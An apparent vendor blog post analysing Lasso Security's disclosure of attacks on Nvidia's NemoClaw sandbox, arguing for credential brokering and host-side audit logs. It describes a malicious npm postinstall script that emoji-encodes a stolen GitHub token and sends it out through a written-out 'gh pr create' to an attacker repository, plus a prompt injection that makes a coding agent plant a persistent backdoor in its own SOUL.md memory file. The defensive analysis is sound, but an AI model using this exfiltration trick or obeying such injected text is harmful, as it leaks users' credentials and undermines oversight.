Back to all posts
Published on · by Renaud Deraison

The sandbox that held the key

On May 18, 2026, Lasso Security disclosed two attacks against Nvidia's NemoClaw — the sandbox that runs the OpenClaw autonomous coding agent. The sandbox worked the way Nvidia said it did. The agent inside the sandbox still pushed the user's GitHub token to an attacker-controlled pull request, encoded as emoji to slip past GitHub's static secret scanner. The interesting question isn't whether the sandbox is broken. It's whether a sandbox with a plaintext credential file inside it was ever a sandbox in the architecturally useful sense, and what the answer implies for everyone shipping a coding agent in 2026.

Two things can be simultaneously true. The first is that Nvidia's NemoClaw sandbox, which wraps the OpenClaw autonomous coding agent in a K3s cluster inside a privileged Docker container, worked exactly the way Nvidia documented it to work. The second is that, on May 18, Lasso Security published a writeup in which a malicious npm postinstall script — running inside that sandbox, doing only things the sandbox was configured to permit — read the user's GitHub token out of a plaintext config file, encoded it as emoji to defeat GitHub's secret scanner, and pushed the result to an attacker-controlled pull request via the very gh binary the egress policy was kind enough to allowlist. Nvidia replied that this fell outside the bug bounty's scope, on the grounds that the sandbox behaved exactly as it was configured to run. This is, in a sense most security people will find familiar, both correct and not the point.

Here is the story in three sentences. On May 18, 2026, Lasso Security published an attack chain against NemoClaw, Nvidia's sandbox for running OpenClaw — an autonomous coding agent that, like Claude Code or Cursor's agent or Codex CLI, is allowed to run npm install, gh pr create, and git push on the user's behalf. The chain has two halves: a credential-exfiltration half, in which a malicious package read /sandbox/.openclaw/openclaw.json (a plaintext file containing the user's GitHub token alongside keys for Anthropic, OpenAI, Gemini, and Nvidia services), rewrote the token as a sequence of emojis using a runtime-built lookup table, and pushed the encoded payload to a public PR through the allowlisted gh binary; and a persistence half, in which a prompt injection planted in a routine source file induced the agent to rewrite its own SOUL.md — OpenClaw's behavioral memory file — with a backdoor that survives every subsequent session. BDTechTalks covered the disclosure the same day; Nvidia's response, quoted in both writeups, was that the sandbox behaved exactly as it was configured to run and that the scenarios fall outside the program's scope.

The Nvidia response is, in a narrow technical sense, true. The sandbox is a sandbox. The K3s pod is a K3s pod. The egress policy, which permits gh to talk to github.com, is a policy that permits gh to talk to github.com. Nothing escaped its capability bounds. Nothing escalated. The container did not break out. From the perspective of the runtime, every byte that left did so via a binary the user had agreed could leave, on a destination the user had agreed it could reach.

It is just that the byte that left was the user's GitHub token, spelled with cartoon faces.

The boring part of the chain.

Let us walk the credential half slowly, because the mechanics are the entire argument. The agent receives a task — something unremarkable, "set up this new project from a GitHub README" — and the README contains, somewhere in its instructions, a step that amounts to npm install some-helpful-package. The package is malicious, but in the same low-key way that a hundred npm packages a week are now malicious: it is a typosquat or a transitive dependency of a recently-compromised package, and it ships a postinstall script. The postinstall script does three things that are individually permitted and collectively catastrophic.

It reads /sandbox/.openclaw/openclaw.json. This file is on the sandbox's filesystem; the script is running inside the sandbox; nobody told the filesystem not to be readable, because how would the agent itself use the GitHub token if it couldn't read the file where the GitHub token lives? It pulls out the ghp_… value.

It loads an emoji_map.json shipped inside the malicious package, which maps each alphanumeric character to an emoji — a perfectly ordinary JSON file, completely innocuous in static scanning, the sort of thing a markdown formatter or a chat client could legitimately ship. The script walks the token character by character and produces a string like 🍕🍔🌮🍟…, one emoji per character.

It runs gh pr create against an attacker-controlled repository with the emoji string as the PR body. From the egress policy's point of view, this is gh talking to github.com, which is the only thing on the allowlist that gh is allowed to do. The PR is created. On the attacker's end, a script reads the PR body, inverts the map, and reconstructs ghp_…. GitHub's secret scanner sees the PR body too, but GitHub's secret scanner is looking for ghp_[A-Za-z0-9]{36}, not for 🍕🍔🌮🍟.

Lasso researcher Noy Pearl, quoted in the disclosure, put it plainly: "Emoji-encoding was the technique we chose in order to bypass GitHub static scans" and "as long as the agent has connection to the outer world, no static mechanism can fully protect you." This is the part where you nod and say yes, obviously, you cannot allowlist a protocol capable of carrying arbitrary bytes and then be surprised when arbitrary bytes go through it. An L7 allowlist that permits gh is an L7 allowlist that permits anything you can serialize into a PR body, which is anything.

NEMOCLAW SANDBOX — K3s pod inside a privileged Docker container, egress allowlist for gh → github.comOPENCLAW AGENT> set up project from README.mdtool: bashnpm i helpful-pkg↳ postinstall runs inside the sandboxCREDENTIAL FILE/sandbox/.openclaw/ openclaw.json "github": "ghp_real_…" "anthropic": "sk-ant…" "openai": "sk-…" "nvidia": "…"EMOJI_MAP.JSON (shipped by the package)"g": 🍕, "h": 🍔, "p": 🌮"_": 🍟, "r": 🥗, "e": 🍣"a": 🍩, "l": 🍪, …static scanners: "this is a JSON file"postinstall: walk token, emit emojighp_real_xxx → 🍕🍔🌮🍟🥗🍣🍩🍪…EGRESS — gh is on the allowlist for github.com, so this is permitted$ gh pr create --repo attacker-handle/totally-normal-repo --title "fix: typo in readme" --body "🍕🍔🌮🍟🥗🍣🍩🍪…"egress policy: gh → github.com ✓github secret scanner: regex misses 🍕sandbox L7 filter: this is just a PRPR opened. Body is public.ATTACKER — outside the sandbox, reading public PRswebhook: PR openedread body, invert emoji_map🍕🍔🌮🍟🥗🍣🍩🍪… → ghp_real_…token recovered; sandbox never brokeEvery arrow in this picture is "permitted" by the sandbox configuration. The lesson is structural, not configurational.
The Lasso exfiltration chain, top to bottom. The agent runs npm install. A postinstall script inside the sandbox reads /sandbox/.openclaw/openclaw.json — a file the sandbox put there so the agent itself could authenticate to GitHub — extracts the ghp_ token, looks each character up in an emoji_map.json that the malicious package shipped (innocuous-looking JSON, passes any static scan), and emits a string of emoji. It then invokes gh — which the sandbox's L7 egress policy allowlists for github.com — to create a pull request whose body is the emoji string. GitHub's secret scanner sees the PR; it is looking for ghp_[A-Za-z0-9]{36}, not for cartoon food. On the attacker's side, a webhook reads the PR body and reverses the map. The token is now public. The sandbox did exactly what it said it would do.

The persistence half — SOUL.md — is mechanically different but philosophically the same. OpenClaw, per Lasso's writeup, keeps a behavioral memory file called SOUL.md that the agent reads at the start of every session: rules, system instructions, accumulated context about the user's preferences. The agent can also write that file, because the entire premise of long-running memory is that the agent should be able to update its own beliefs. A prompt injection planted in a perfectly normal-looking source file the agent processes during a routine task — Lasso's example is a text file that just contains instructions phrased the way training data is phrased — causes the agent to append a backdoor rule to SOUL.md. Subsequent sessions load SOUL.md. The backdoor is now, in the agent's own description of itself, the agent's preferences. Pearl's framing on Nvidia's "behaved as configured" defense is the sharp one: "The sandbox behaved as configured is a fine argument when the thing running inside is a deterministic program. It doesn't survive contact with LLM-driven agents, whose behavior is shaped at runtime by every piece of text they ingest."

A token in a file is a token in a file.

The architectural sentence I want to write here, before getting to what Bromure does about any of this, is this one: a long-lived secret that lives as a plaintext file inside the same blast radius as the code that the agent runs is, for the purposes of any adversary who can run code in that blast radius, equivalent to a public secret. The sandbox doesn't change this. The K3s pod doesn't change this. The egress allowlist doesn't change this, because the egress allowlist is allowed to talk to GitHub, and talking to GitHub — by design, by user intent, by the entire reason the agent exists — is the same channel the malicious package will use.

There is a well-understood fix for this, and it predates AI agents by decades, and the security industry has been quietly using it since the 1990s. The fix is to put the secret on the other side of a process boundary and broker its use, never its value.

The canonical example is ssh-agent. Your SSH private key lives in a memory region owned by the ssh-agent process. When ssh needs to authenticate, it does not say "give me the key"; it sends the challenge bytes over a Unix domain socket and gets back a signature. The key never crosses the socket. A malicious binary running as the same user can ask ssh-agent to sign things, sure — that is the agent's whole point — but it cannot read the key, cannot copy it, cannot exfiltrate it, cannot mail it home. When the session ends, the key dies with the process. WebAuthn does structurally the same thing for browsers: the private key lives in the TPM or the Secure Enclave, the page asks the browser to sign a challenge, the page never sees the key. The decade-long industry migration away from passwords-in-localStorage is, when you squint at it, the same migration NemoClaw needs to make. Just one floor up.

And it works for GitHub too. The gh CLI ships with a credential helper that, on macOS, can store the token in Keychain rather than in a plaintext config file. More usefully for the sandbox case, GitHub Apps issue installation tokens that are short-lived (typically an hour), scoped to specific repositories, and revocable; a signing proxy running outside the sandbox can mint one of these on demand, attach it to a request the agent generated, and forward the result. The sandbox sees a generic HTTP response. The sandbox does not see the token. A malicious postinstall script asking to read the token from the brokered endpoint gets back, at best, a one-hour token scoped to one repo — enough to do whatever the agent was actually doing on the user's behalf, not enough to be worth exfiltrating.

SANDBOX (Bromure per-profile VM) — what the malicious postinstall script can seeCODING AGENT$ gh pr create … → /var/run/cred.sockno token in env,no token on diskFILESYSTEM & ENV — no plaintext credential/sandbox/.openclaw/openclaw.jsonNo such file$GH_TOKENunset$GITHUB_TOKENunset/var/run/cred.sockUnix socket → host brokerPOSTINSTALLcat openclaw.json ENOENTenv | grep TOKEN (empty)PROCESS / VM BOUNDARY — RPC only, value never crossesHOST — credential broker holds the real keyREAL CREDENTIAL VAULTmacOS Keychain / ssh-agentid_ed25519 (private)gh credential helperghp_real_…GitHub App private key→ mints 1h scoped tokensSame pattern as ssh-agent (1995).Same pattern as WebAuthn (2018).SIGNING PROXY — uses the key, never exposes itlisten /var/run/cred.sock RPC: "sign this git push for repo X" mint installation token, scope=X, ttl=1h attach Authorization header at egress forward HTTPS, return responseRPC "give me the token" → not implementedRPC: please push for me
What credential brokering does to the same chain. The plaintext openclaw.json is gone; in its place is a credential broker running outside the sandbox, on the host. When the agent inside the sandbox needs to push a commit, it talks to a host-side proxy over a Unix domain socket. The proxy holds the real long-lived GitHub credential (or a GitHub App that mints short-lived installation tokens on demand). The proxy attaches the credential to the outbound request, forwards it, and returns the response to the sandbox. The token never enters the sandbox's memory or filesystem. A malicious postinstall script reading the sandbox's filesystem finds no token to encode. A malicious postinstall script asking the broker to sign something gets, at most, a one-hour scope-limited token bound to the repo the agent was already authorized for — the same posture ssh-agent has given Unix users since the 1990s, just applied to GitHub.

The pattern has a name in each domain that uses it — ssh-agent, WebAuthn, HSM-backed signing, gh's credential helper, AWS IAM Roles Anywhere — and the underlying property is always the same: the consumer of the credential is a different process from the holder of the credential, and they communicate over a channel narrower than "read the bytes." It is the difference between "the agent can authenticate to GitHub" and "the agent can read the GitHub token." A sandbox that gets this wrong is a sandbox that has put the front-door key on the same side of the door as the people you were worried about.

This is, to be unambiguous, what Bromure does for the per-profile VM that runs your coding agent. The agent inside the VM authenticates to GitHub by talking to a credential broker on the macOS host over a forwarded Unix domain socket; the GitHub token (or, better, the GitHub App private key that mints short-lived scoped tokens) lives on the host side of the hypervisor, in the macOS Keychain, where the VM cannot see it. The agent never reads the secret value, only uses it through the proxy. A postinstall script that runs cat /sandbox/.openclaw/openclaw.json finds nothing; one that runs env | grep TOKEN finds nothing; one that asks the broker "please give me the token" finds out that the broker's RPC vocabulary does not include that verb. The same posture, applied to the GitHub agent the way it has been applied to SSH for thirty years.

A polite suggestion is not a perimeter.

The Lasso emoji trick is, in a deep sense, a comment on allowlists. The egress policy permitted gh to talk to github.com. The implicit assumption was that the things gh would do to github.com would be things a reasonable developer would want to do — clone, push, open PRs, comment on issues. But gh pr create --body "$ANYTHING" is, by construction, a primitive that carries arbitrary bytes to a publicly readable destination. You cannot allowlist that primitive and also prevent arbitrary bytes from going through it. The allowlist is doing what it said. It just isn't doing what you thought it said.

This is the part of the Lasso writeup that should make anyone running an agent in production sit down. An L7 allowlist that permits a protocol capable of carrying arbitrary bytes isn't a perimeter. It's a polite suggestion that the bytes inside the protocol be the bytes you had in mind. Whether the bytes are in a PR body, in a commit message, in an issue comment, in a git-LFS blob, in the metadata of a tarball uploaded as a release asset — the protocol is the leak. There is no static filter that "understands" the difference between a legitimate emoji-heavy PR ("our team uses 🍰 to mean release") and an emoji-encoded GitHub token, because the difference is semantic and the filter is syntactic.

So what would detect this? The honest answer is that no single trick does it; the structure that does is a combination, and each piece is uninteresting on its own.

The first piece is per-session egress byte budgets. A session whose brief is "fix a typo in README.md" should not be pushing 14 kilobytes of binary blob to a PR body, ever, for any reason. You do not need to know what the bytes are; you need to know what the session was supposed to ship. Shape mismatch between brief and egress is computable, but only if something outside the agent is keeping track of the brief and the egress in the same place. The agent's self-report won't do; the agent is the thing under suspicion.

The second is content-shape anomaly detection on outbound git operations. A PR whose body is 95% emoji, or 95% base64, or 95% hex, in a repository whose history contains zero such PRs, is a flag. It is not proof; it is a flag. The right place to compute that flag is the egress proxy, which sees the outbound request before it leaves the host. Bromure's hypervisor-level proxy is the place that can compute it without trusting the guest, because the guest is exactly the thing under suspicion.

The third is session-end diffs of what left the box against what the session was supposed to produce. At the end of a session, the VM has produced a set of outbound HTTP requests, a set of file writes to the mounted project, a set of git commits. If the session brief was "fix a typo," and the outbound requests include POST /repos/attacker-handle/random-repo/pulls, that is a diff a human can be shown in two lines. Not blocked, necessarily — sometimes agents genuinely need to do surprising things — but shown. The current default in 2026, across most coding-agent products, is "trust me bro, it worked," and the user has no artifact to inspect even if they wanted to.

The audit pipeline is the artifact.

This is the part where it is worth saying out loud what Bromure Enterprise actually ships, because the alternative — relying on the agent's own logs — is what got NemoClaw into this position to begin with. The agent's logs are written by the agent. If the agent has been instructed by a poisoned SOUL.md to lie about what it did, the agent's logs will lie about what it did. There is exactly one place that can produce a truthful record of what an agent did, and that is the layer underneath the agent.

Bromure Enterprise records, on the host side of the hypervisor, "the full session — tool calls, shell commands, file edits, exit codes" as JSON Lines. Tracing is on by default; engineers do not opt in; the agent inside the VM is unmodified Claude Code or Codex or Cursor. The stream is "captured outside the VM in a tamper-resistant JSON Lines stream and delivered to the log sink you already feed (SIEM, data lake, retention archive)." A compromised dependency inside the VM cannot scrub it, because the writes happen on the other side of the hypervisor boundary the dependency cannot cross.

The interesting consequences:

  • "Did this session push to a repo that wasn't the user's repo" is a grep. Not a metaphorical grep. A literal grep against yesterday's JSON Lines.
  • "Did this session open a PR with a body that doesn't look like prose" is a regex against the captured tool-call payload.
  • "Did anything modify SOUL.md" is a query on file-edit events. If a postinstall script rewrote the agent's identity file, that fact lives in the trace whether or not the agent itself ever mentioned it.
  • Replay. Traces attach to a pull request. The reviewer reads the diff and the sequence of prompts, tool calls, and shell commands that produced the diff. Or, in the language of the Bromure product page: "replay the day the model decided to delete the migrations folder." Forensic replay is the part of this story that doesn't exist anywhere else, because it requires having captured the inputs and the outputs and the model responses in the same stream — which the agent itself cannot produce without first being trusted not to lie.

None of this catches a determined attacker who shapes the exfil to look like prose; there is no perimeter against an adversary willing to spend bytes on disguise. What it does catch is every attacker who didn't, which is most of them, and it produces the forensic record that turns the next incident from "we have no idea what the agent did" into "we have line 14,332 of yesterday's session trace." The 2026 default of "the agent said it succeeded" is the equivalent of running production on a server with no logs.

What about the prompt injection inside the session?

It is worth being clear about what VM isolation does not fix, because the people most likely to read this post are the same people most likely to be told, by somebody selling the opposite product, that VMs are a panacea. They aren't.

The SOUL.md backdoor — and any prompt injection that takes effect during a session — runs inside the VM, with whatever scope the user granted the agent. If the user told the agent "create a PR in this repo," the prompt injection can create a PR in this repo. If the agent has write access to the project folder, the prompt injection can write a backdoor into the project folder. The VM does not review the diff. What the VM does is keep the diff and its provenance in a place where someone can review it later, which turns out to be the part that was missing.

What VM isolation plus credential brokering does fix is the catastrophic part — the part where a single bad postinstall walks off with a permanent GitHub token, a permanent npm token, your AWS credentials, and root on the developer's laptop. None of those credentials live inside the VM; the credentials live in the host Keychain and are reached only through a proxy whose RPC vocabulary does not include "give me the bytes." A token the agent can use through a proxy is a token the agent cannot exfiltrate, because exfiltration requires having the bytes to send.

The remaining attacker capability inside a Bromure-hosted OpenClaw-equivalent — what they can do once they have prompt- injected the agent — is to make the agent do, within the session's authorized scope, something the user did not intend. Open a PR with a strange title. Rewrite SOUL.md in the project. Add a postinstall of their own. All of these are observable events: every file edit hits the JSON Lines audit stream, every outbound request hits the egress proxy, every prompt and tool call is recorded outside the agent. The VM is not asked to prevent the prompt-injected agent from doing in-scope harm — it is asked to make that harm visible and bounded to the session, so the host stays clean and the user has a trace to read. Persistence inside the VM is still possible; persistence inside the VM that nobody can see is not, which is a meaningful distinction.

Coupled with credential brokering, the worst-case for the attack on a Bromure-hosted agent looks like: the agent ships one bad PR, in the repo it was already authorized for, using a short-lived installation token, and every step appears in a tamper-resistant log on the host. That is not zero damage. It is a long way from "the attacker has my permanent GitHub token, exfiltrated as emoji, plus a persistent backdoor in the agent's behavioral file, plus no record that any of it happened."

What's actually structural here.

If you read the Lasso writeup and the Nvidia response in sequence, the disagreement is not really about whether NemoClaw has a CVE-worthy bug. Nvidia is right that the sandbox did what it was configured to do. Lasso is right that what it was configured to do is insufficient. The disagreement is about where the trust boundary belongs.

Nvidia, in the response Pearl quotes, draws the boundary at "the configured policy." Inside the policy, anything goes; outside the policy, the customer is on their own. This is a normal shared-responsibility position for an infrastructure vendor. It is not, however, a defense against the failure mode Lasso demonstrated, because the failure mode is inside the policy. The policy permits gh. gh can carry the token. The policy is self-consistent and inadequate at the same time.

The structural alternative — the position the agentic-coding posts on this blog have been arguing for in different language for six months — is to draw the boundary at the credential and the observation, not at the binary and the destination. Brokering says the credential never enters the sandbox. The hypervisor-level audit pipeline says that whatever the agent does inside the sandbox is captured by something the agent cannot write to and cannot turn off. Together they make a sandbox where the worst a malicious postinstall can do is the worst the agent was authorized to do, on the repo it was already touching, with credentials it cannot exfiltrate because it never had them, and with every keystroke of evidence sitting in your SIEM.

The Nvidia people are not wrong. The OpenClaw architecture is the architecture of every coding agent shipped this year, and that includes coding agents not run inside a sandbox at all. What Lasso found in NemoClaw is, structurally, what Wiz and Snyk and Socket find every other Tuesday in Cursor and Windsurf and GitHub Copilot's YOLO mode. The class of problem is "long-lived plaintext credentials accessible to whatever the agent runs, with no record of what the agent did with them," and the fix class is "broker the credential, observe the session, keep the receipts."

One last thing.

There is a version of this post where the lesson is "don't trust sandboxes." That version is wrong. Sandboxes are great. There is a version where the lesson is "AI agents are too dangerous to deploy." That version is, as a practical matter, irrelevant — they are deployed, the question is how. The version that holds up is the one where the sandbox stops being asked to do work the sandbox cannot, by construction, do.

A sandbox cannot hide a credential from a process that runs inside it. A sandbox cannot tell the difference between an emoji PR body and an emoji-encoded token. A sandbox cannot make a long allowlisted protocol into a short one. What a sandbox can do is keep the credentials somewhere else, keep the agent in a place where the hypervisor sees every move it makes, and write that record to a sink the agent cannot reach. That is the configuration where the same malicious npm package, in the same kind of postinstall script, finds an empty filesystem, a credential socket whose only verb is "sign this thing for me, briefly," and a hypervisor on the other side of the wall that has been writing down the whole conversation.

Bromure Agentic Coding is the configuration where that is the default. It is free, open-source, and shipped today. The next emoji is already being uploaded.